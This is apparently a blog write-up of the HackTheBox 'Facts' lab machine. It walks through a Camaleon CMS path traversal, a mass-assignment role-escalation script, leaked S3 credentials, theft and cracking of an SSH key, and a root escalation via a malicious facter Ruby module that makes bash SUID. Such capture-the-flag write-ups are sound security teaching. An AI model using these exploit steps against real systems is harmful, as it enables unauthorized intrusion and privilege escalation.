Yogeshwar Peela

Posted on Jun 11 • Originally published at exploitnotes.hashnode.dev

HackTheBox - Facts Writeup

#hackthebox #linux #infosec #cybersecurity

Difficulty: Easy
OS: Linux

Reconnaissance

Nmap

nmap -sCV -A -p- <MACHINE-IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2
80/tcp open  http    nginx 1.26.3 (Ubuntu)

Two open ports — SSH and nginx on port 80.

/etc/hosts

echo "<MACHINE-IP> facts.htb" >> /etc/hosts

Web Enumeration

Visiting port 80 presents a Camaleon CMS trivia site. The /admin path redirects to /admin/login, which has self-registration enabled.

feroxbuster -u http://facts.htb/ -w /usr/share/wordlists/dirb/big.txt -d 3 -C 403,404

302  http://facts.htb/admin  =>  http://facts.htb/admin/login
200  http://facts.htb/ajax

Navigating to /admin/login and clicking "Create an account" creates a working low-privilege CMS account. After logging in, the footer reveals Camaleon CMS Version 2.9.0.

Initial Access — LFI via CVE-2024-46987

Camaleon CMS < 2.9.1 is vulnerable to a path traversal in the download_private_file media endpoint. Any authenticated user, regardless of role, can read arbitrary files from the server filesystem.

GET http://facts.htb/admin/media/download_private_file?file=../../../etc/passwd

This returns the contents of /etc/passwd, confirming arbitrary file read. Relevant system users:

root:x:0:0:root:/root:/bin/bash
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash

Foothold — CMS Admin via CVE-2025-2304 (Mass Assignment)

Camaleon CMS < 2.9.1 is also vulnerable to mass assignment in the updated_ajax password-change endpoint. The controller uses Rails' dangerous permit! method which allows all parameters through without any filtering — including role.

Injecting password[role]=admin into the password change POST request escalates a low-privilege account to full CMS admin.

Exploit script (exploit.py):

update_data = {
    "_method": "patch",
    "authenticity_token": auth_token,
    "password[password]": password,
    "password[password_confirmation]": password,
    "password[role]": "admin",
}
session.post(submit_url, data=update_data)

Running the exploit:

python3 exploit.py -t http://facts.htb -u test -p test

[+] Login successful
[+] Got profile page
[i] Version 2.9.0 — appears vulnerable (< 2.9.1)
[+] Got CSRF token: E9u8O-QxqReFdXp6FbaD...
[*] Sending privilege escalation request to http://facts.htb/admin/users/5/updated_ajax ...
[+] Done! Role should now be 'admin' — try refreshing your session.

After refreshing the session, the full admin navigation is available including Settings, Users, Plugins, and Appearance.

AWS S3 Credential Leak

Navigating to Settings → General Site → Filesystem Settings exposes AWS S3 credentials stored in plaintext in the CMS configuration:

AWS Access Key ID:      AKIA604F64A80C48D2DF
AWS Secret Access Key:  /Vb8uEE1VHYg7rcu84gpSnmF9Tb8XoIT020xkWDo
Bucket Name:            randomfacts
Region:                 us-east-1
Endpoint:               http://localhost:54321

The endpoint points to a LocalStack instance running locally on the target. Since port 54321 is bound to localhost on the box, it is accessed via facts.htb:54321 after adding the host entry. Configuring the AWS CLI with the leaked credentials:

aws configure
# AWS Access Key ID: AKIA604F64A80C48D2DF
# AWS Secret Access Key: /Vb8uEE1VHYg7rcu84gpSnmF9Tb8XoIT020xkWDo
# Default region name: us-east-1
# Default output format: json

Listing all buckets:

aws --endpoint-url http://facts.htb:54321 s3 ls

2025-09-11  internal
2025-09-11  randomfacts

A non-public internal bucket exists alongside the expected randomfacts bucket. Listing it recursively:

aws --endpoint-url http://facts.htb:54321 s3 ls s3://internal --recursive

2026-06-10  .ssh/authorized_keys
2026-06-10  .ssh/id_ed25519

An SSH private key is present. Downloading it:

aws --endpoint-url http://facts.htb:54321 s3 cp s3://internal/.ssh/id_ed25519 .
chmod 600 id_ed25519

SSH — Cracking the Key Passphrase

Attempting to use the key immediately prompts for a passphrase, confirming it is encrypted:

ssh-keygen -y -f id_ed25519
# Enter passphrase for "id_ed25519":

Converting to john format and cracking against rockyou:

ssh2john id_ed25519 > hash.john
john hash.john --wordlist=/usr/share/wordlists/rockyou.txt

dragonballz      (id_ed25519)
1g 0:00:02:42 DONE

Passphrase cracked: dragonballz

Connecting as trivia (identified earlier via the LFI on /etc/passwd):

ssh -i id_ed25519 trivia@<MACHINE-IP>
# Enter passphrase for key 'id_ed25519': dragonballz

trivia@facts:~$ id
uid=1000(trivia) gid=1000(trivia) groups=1000(trivia)

User Flag

trivia@facts:~$ cat /home/william/user.txt

HTB{REDACTED}

Privilege Escalation to Root — Facter Custom Module

Checking sudo permissions for the current user:

sudo -l

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

facter is a Puppet system facts tool that supports loading custom Ruby fact modules via the --custom-dir flag. Running it under sudo with a controlled directory allows arbitrary Ruby execution as root.

Creating a malicious fact module that sets the SUID bit on /usr/bin/bash:

echo 'Facter.add("evil") {setcode { `chmod +s /usr/bin/bash` } }' > evil.rb

Running facter with the custom module:

sudo /usr/bin/facter --custom-dir ~ evil

Verifying the SUID bit was set:

ls -la /usr/bin/bash
# -rwsr-sr-x 1 root root ... /usr/bin/bash

Spawning a root shell with bash's -p flag (preserve effective UID):

bash -p

bash-5.2# whoami
root

Root Flag

bash-5.2# cat /root/root.txt

HTB{REDACTED}

Credentials Summary

User	Credential	Source
trivia (CMS)	test / test	Self-registration
trivia (SSH)	id_ed25519 / dragonballz	Internal S3 bucket + john
root	—	facter sudo SUID trick

Key Vulnerabilities

#	Vulnerability	Impact
1	CVE-2024-46987 — Camaleon CMS path traversal in `download_private_file`	Arbitrary file read as web user
2	CVE-2025-2304 — Camaleon CMS mass assignment via `permit!` in `updated_ajax`	Role escalation to CMS admin
3	AWS S3 credentials exposed in CMS filesystem settings	Access to internal LocalStack bucket
4	SSH private key stored in internal S3 bucket with weak passphrase	Shell as `trivia`
5	`sudo /usr/bin/facter --custom-dir` (NOPASSWD) with controllable Ruby	Root via SUID bash

Attack Chain

Self-Registration → Low-Privilege CMS Account
  → CVE-2024-46987 LFI → /etc/passwd (user enumeration)
    → CVE-2025-2304 Mass Assignment → CMS Admin Role
      → Settings Panel → AWS S3 Credentials (plaintext)
        → LocalStack S3 → internal bucket → id_ed25519
          → john + rockyou → passphrase: dragonballz
            → SSH as trivia
              → sudo facter --custom-dir (NOPASSWD)
                → Custom Ruby Fact → chmod +s /usr/bin/bash
                  → bash -p → root

DEV Community